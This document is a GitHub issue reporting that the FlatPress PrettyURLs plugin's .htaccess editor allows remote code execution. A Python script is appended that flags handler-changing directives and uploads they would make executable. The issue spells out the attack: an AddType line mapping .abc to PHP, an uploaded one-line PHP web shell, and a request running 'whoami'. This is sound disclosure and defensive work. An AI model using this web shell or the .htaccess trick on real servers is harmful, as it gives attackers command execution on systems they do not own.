
PrettyURLs plugin: htaccess editor poses potential threats #379

@azett

Description


As pointed out in #217 by @JuyLang, enabling the site admin to edit the .htaccess file directly may lead to remote code execution (RCE):

  • Go to Admin Area / Plugins / PrettyURLs Config
  • add AddType application/x-httpd-php .abc to .htaccess content -> this makes your web server treat .abc files as PHP files to be executed
  • upload a test.abc file with content some content <?php system($_GET['cmd']); ?>
  • Call http://yourflatpress/fp-content/attachs/test.abc?cmd=whoami -> boom, RCE ☠️

Although all of the above is only possible when logged in as site admin properly, it is worth discussing if the .htaccess editor in the PrettyURLs plugin is really necessary. If not, it should be removed.

Your opinions, please!
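A defensive check for the situation the issue describes, added here as an example and not part of FlatPress or the PrettyURLs plugin: it scans .htaccess text for directives that change how the server maps files to handlers, and reports which existing uploads would become executable if that content were saved. The directive list, the sample .htaccess and the sample upload names are constructed assumptions.

```python
import re

# Directives that change handler mapping or PHP settings. Any of these in
# an admin-edited .htaccess deserves review before the file is written.
# This list is an assumption for the example, not taken from the issue.
HANDLER_DIRECTIVES = {
    "addtype", "addhandler", "sethandler", "action", "removehandler",
    "php_flag", "php_value", "php_admin_flag", "php_admin_value",
}

_TYPE_RE = re.compile(r"^(?:addtype|addhandler)\s+(\S+)\s+(.+)$", re.I)


def find_risky_directives(htaccess_text):
    """Return (line_number, line) for every directive in HANDLER_DIRECTIVES."""
    findings = []
    for lineno, raw in enumerate(htaccess_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.split(None, 1)[0].lower() in HANDLER_DIRECTIVES:
            findings.append((lineno, line))
    return findings


def php_mapped_extensions(htaccess_text):
    """Extensions that an AddType/AddHandler line maps onto a PHP handler."""
    exts = set()
    for _, line in find_risky_directives(htaccess_text):
        m = _TYPE_RE.match(line)
        if m and "php" in m.group(1).lower():
            for token in m.group(2).split():
                exts.add(token.lower() if token.startswith(".") else "." + token.lower())
    return exts


def uploads_made_executable(htaccess_text, filenames):
    """Names from `filenames` that would be executed as PHP under this .htaccess."""
    exts = php_mapped_extensions(htaccess_text)
    return sorted(n for n in filenames if any(n.lower().endswith(e) for e in exts))


# Constructed sample: the content an editor field might hold, plus sample uploads.
SAMPLE_HTACCESS = """\
# constructed sample
RewriteEngine On
RewriteRule ^(.*)$ index.php?$1 [QSA,L]
AddType application/x-httpd-php .abc
"""
SAMPLE_UPLOADS = ["image.png", "test.abc", "notes.txt"]

if __name__ == "__main__":
    for lineno, line in find_risky_directives(SAMPLE_HTACCESS):
        print(f"line {lineno}: {line}")
    print("uploads now executable:", uploads_made_executable(SAMPLE_HTACCESS, SAMPLE_UPLOADS))
```

Rejecting a save when `find_risky_directives` returns anything is the simplest way to keep the editor while closing this particular path; removing the editor, as the issue suggests, removes the need for the check altogether.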
